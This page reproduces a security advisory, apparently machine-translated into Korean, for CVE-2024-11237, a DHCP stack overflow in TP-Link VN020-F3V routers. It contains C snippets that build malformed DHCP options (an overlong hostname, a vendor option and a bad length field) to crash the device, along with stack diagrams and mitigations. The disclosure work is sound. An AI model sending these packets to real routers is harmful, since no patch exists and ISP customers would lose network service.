홈페이지>프로그래밍 관련>기타 소스코드
다운로드

TP-Link VN020 DHCP 메모리 손상 (CVE-2024-11237)

DHCP 패킷 처리의 중요한 취약점

개요

펌웨어 버전 TT_V6.2.1021을 실행하는 TP-Link VN020 F3V (T) 라우터에서 중요한 취약점이 발견되었습니다. 이 취약점을 통해 원격 공격자는 특별히 제작 된 DHCP 디스커버리 패킷을 통해 스택 기반 버퍼 오버플로를 트리거하여 DOS (Denial of Service) 조건으로 이어질 수 있습니다.

영향을받는 장치 :

  • 라우터 모델 : TP-Link VN020-F3V (T)
  • 펌웨어 버전 : TT_V6.2.1021
  • 배포 : 주로 Tunisie Telecom 및 Topnet ISP를 통해
  • 확인 된 변형 : 알제리 및 모로코 버전에도 영향을 미칩니다

중요 참고 사항 : 펌웨어의 독점적 특성으로 인해 정확한 내부 구현 세부 정보는 알려져 있지 않습니다. 이 분석은 관찰 된 동작 및 블랙 박스 테스트를 기반으로합니다.

취약성 세부 사항

  • CVE ID : CVE-2024-11237
  • 유형 : 스택 기반 버퍼 오버플로 (CWE-121)
  • 공격 벡터 : 원격 (DHCP Discover Packet)
  • 인증 : 필요 없음
  • 포트 : UDP/67 (DHCP 서버)
  • 영향 : DOS (확인) & RCE (가능)
  • 복잡성 : 낮음

기술 분석

DHCP 패킷 구조 

 [Basic DHCP Header]
0x00: 01        ; BOOTREQUEST
0x01: 01        ; Hardware type (Ethernet)
0x02: 06        ; Hardware address length
0x03: 00        ; Hops
0x04-0x07: XID  ; Random transaction ID
0x08-0x09: 0000 ; Seconds elapsed
0x0A-0x0B: 8000 ; Flags (Broadcast)
0x0C-0x1F: 0000 ; Client/Server/Gateway IPs
0x20-0x28: MAC  ; Client hardware address
0x29-0x2C: 0000 ; Padding

착취 벡터

  1. DHCP 호스트 이름 처리 
 // Overflow trigger through hostname option
unsigned char long_hostname [ 128 ];
memset ( long_hostname , 'A' , sizeof ( long_hostname ) - 1 );
long_hostname [ 127 ] = '' ;
add_option ( packet , offset , 0x0C , 127 , long_hostname );
  1. 공급 업체 별 옵션 
 // Vendor option manipulation
unsigned char vendor_specific [] = { 
    0x00 , 0x14 , 0x22 ,  // TP-Link vendor prefix
    0xFF , 0xFF , 0xFF   // Trigger condition
};
add_option ( packet , offset , 0x2B , sizeof ( vendor_specific ), vendor_specific );
  1. 길이 현장 조작 
 // Claimed vs actual length mismatch
add_option ( packet , offset , 0x3D , 0xFF , ( unsigned char []) { 0x01 });

잠재적 기억 부패

정확한 내부 구현은 알려져 있지 않지만 관찰 된 행동은 잠재적 인 메모리 손상 문제를 시사합니다.

정상적인 DHCP 호스트 이름 처리 

 Stack Layout (Normal Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Return Address (4)   |
+------------------------+
|    Saved EBP (4)       |
+------------------------+
|                        |
|   Hostname Buffer      |
|      (64 bytes)        |
|                        |
+------------------------+ Lower addresses
|    Other Variables     |
+------------------------+

라우터 내부에서 잠재적으로 어떤 일이 일어날 수 있습니까? 

 Stack Layout (Overflow Case)
+------------------------+ Higher addresses
|     Previous Frame     |
+------------------------+
|   Overwritten Return   | 
+------------------------+
|   Overwritten EBP      | <- Unknown state corruption
+------------------------+
|     Overflow Data      | <- 127 bytes of 'A'
|         ...            |
+------------------------+ Lower addresses
|    Other Variables     | <- Potentially corrupted
+------------------------+

TP-Link 가이 라우터에 대한 펌웨어를 ISP에만 제공하기 때문에 이것은 이론적이며 특정 세부 사항은 완전히 정확하지 않을 수 있습니다.

비디오 데모

poc.mp4
Wireshark.mp4

라우터는 여기에 표시된 충돌로 인해 여기에 표시된대로 자체를 다시 시작하려고 시도 할 수 있습니다.

router_effect.mp4

관찰 된 영향

  • 즉각적인 장치의 응답 성
  • DHCP 서비스 실패
  • 자동 라우터 재시작
  • 수동 개입이 필요한 네트워크 중단

타임 라인

  • 초기 발견 : 2024 년 10 월 20 일
  • 공급 업체 알림 : 2024 년 11 월 3 일
  • CVE 과제 : 2024 년 11 월 15 일

완화

현재 공식 패치가 없습니다. 임시 완화에는 다음이 포함됩니다.

  1. 필요하지 않은 경우 DHCP 서버를 비활성화하십시오
  2. 네트워크 에지에서 DHCP 트래픽 필터링을 구현하십시오
  3. 가능하면 대체 라우터 모델을 고려하십시오

참조

  1. CVE-2024-11237
  2. CWE-121 : 스택 기반 버퍼 오버플로

연구원

모하메드 마탈라

  • github : @zephkek
  • 제휴 : 독립 보안 ​​연구원
확장하다
추가 정보
관련 애플리케이션
추천
관련 정보 전체